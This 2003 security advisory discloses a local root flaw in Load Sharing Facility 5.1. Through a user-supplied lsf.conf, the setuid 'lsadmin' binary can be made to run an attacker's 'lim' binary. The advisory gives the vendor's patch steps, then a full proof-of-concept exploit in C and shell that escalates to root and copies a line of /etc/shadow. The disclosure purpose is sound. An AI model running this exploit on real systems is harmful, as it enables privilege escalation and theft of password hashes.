Security advisory: LSF 5.1 local root exploit

2003-05-22T00:00:00
ID SECURITYVULNS:DOC:4562
Type securityvulns
Reporter Securityvulns
Modified 2003-05-22T00:00:00

Description

                 Security Advisory

                    22 May 2003

               Local root in LSF 5.1

Name: Load Sharing Facility version 5.1 Severity: High Vendor URL: http://www.platform.com Author: Tomasz Grabowski (cadence@aci.com.pl) Vendor notified: 25 Feb 2003 Vendor response: 25 Feb 2003 Vendor fix: 19 Mar 2003

Commercial: I'm looking for a new job

Impact: An attacker can gain root priviledge by forcing the 'lsadmin' binary to execute code of attackers choice. The 'lsadmin' binary is setuid root.

Description:

The 'lsadmin' binary has a "ckconfig" command. It uses it to check the correctness of config files. Right after it starts, it is using the external 'lim' binary . It is using the LSF_SERVERDIR variable in lsf.conf file to obtain a path for 'lim' binary. Regular user can make his own lsf.conf file and, by using the LSF_ENVDIR variable, force 'lsadmin' to use it instead of default /etc/lsf.conf file. Attacker can therefore point the LSF_SERVERDIR variable to his own 'lim' binary. The attackers 'lim' binary will be executed with setuid root priviledges.

How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com location: /patches/5.1/patch/sup_by_dev33993/ file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact support@platform.com

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old. Uncompress and rename downloaded binary to lsadmin. Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact support@platform.com

Exploit:

LSF 5.1 'lsadmin' local root exploit

2003.03.20 - CADENCE of Lam3rZ

Proof of concept - for educational purposes only!

cat <<END> attacker_code.c

include <stdio.h>

int main() { FILE secret_file; FILE temp_file; char one_line[128]; setuid(0);setgid(0); secret_file = fopen("/etc/shadow", "r"); temp_file = fopen(".temp.file", "w"); fgets(one_line, 120, secret_file); fputs(one_line, temp_file); fclose(secret_file); fclose (temp_file); } END

gcc attacker_code.c -o lim chmod 777 lim export LSF_SERVERDIR=. lsadmin ckconfig cat .temp.file rm -f attacker_code.c lim .temp.file


Tomasz Grabowski (0-91)4494234 Akademickie Centrum Informatyki mailto:cadence@man.szczecin.pl